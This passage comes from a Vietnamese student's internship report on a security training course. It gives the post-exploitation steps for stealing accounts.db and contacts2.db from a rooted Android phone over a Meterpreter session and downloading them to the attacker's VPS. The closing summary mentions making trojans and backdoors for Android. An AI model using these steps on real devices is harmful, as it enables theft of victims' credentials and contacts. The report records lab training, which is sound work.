II. Làm trên trên môi trường VPS
4. Đánh cắp tài khoản
Trước tiên ta phải vào hệ thống của máy android. Lưu ý: máy android này phải được root trước đó.
Ta dùng lênh shell để vào hệ thống Dùng lệnh su để toàn quyền truy cập
Dùng lệnh whoami để biết máy android đã được root chưa. Nếu rồi thì nó sẽ hiện thông báo là:unknown uid 0
Ta gõ cd /data/system để vào thư mục system Tiếp theo gõ ls –l để xem trong thư mục có gì
Ta gõ lệnh cp accounts.db /sdcard để copy file accounts.db về Sdcard
Sau đó ta trở về meterpreter bằng lệnh exit rồi dùng lệnh download file accounts.db về máy VPS của chúng ta
/data/data/com.android.providers.contacts/databases
để copy file contacts2.db về Sdcard
Sau đó ta download file contacts2.db về máy VPS
Ta mở file *.db bằng phần mềm SQLite. Ta có thể down phần mềm đó về vài cài vào VPS của chúng ta
III. KẾT QUẢ ĐẠT ĐƯỢC
Những kiến thức lý thuyết đã được củng cố:
Tìm hiểu về lịch sử, quá trình phát triển của hệ điều hành Android
Tìm hiểu về hệ điều hành Kali Linux
Tìm hiểu về các lỗ hổng bảo mật của Windows và Android
Tìm hiểu về cách sửa đổi file APK và thực hiện Signing ứng dụng
Những kỹ năng thực hành đã được học thêm:
Thực hiện cài đặt Android trên máy ảo
Cài đặt Kali Linux, sử dụng nó để hack vào các lỗ hổng bảo mật của Windows và Android
Thi lấy chứng chỉ System Hacking của trung tâm Athena
Thực hiện sửa đổi, tạo ra các file Trojan, Backdoor sau đó cài đặt vào Android
Biết thêm về một số bài học trong lớp Hacker mũ trắng
Những kinh nghiệm thực tiễn đã tích lũy được:
Qua gần 2 tháng thực tập, bản thân em đã đúc kết được nhiều kinh nghiệm quý báu, thứ nhất đó là các kĩ năng về chuyên môn, em đã được học và cũng cố các kiến thức mới bên cạnh các kiến thức nền tảng. Hơn đó nữa là quá trình thực tập trong môi trường doanh nghiệp đã cho em làm quen dần để không bỡ ngỡ trong quá trình đi làm sau này, thông qua các kĩ năng giao tiếp và ứng xử.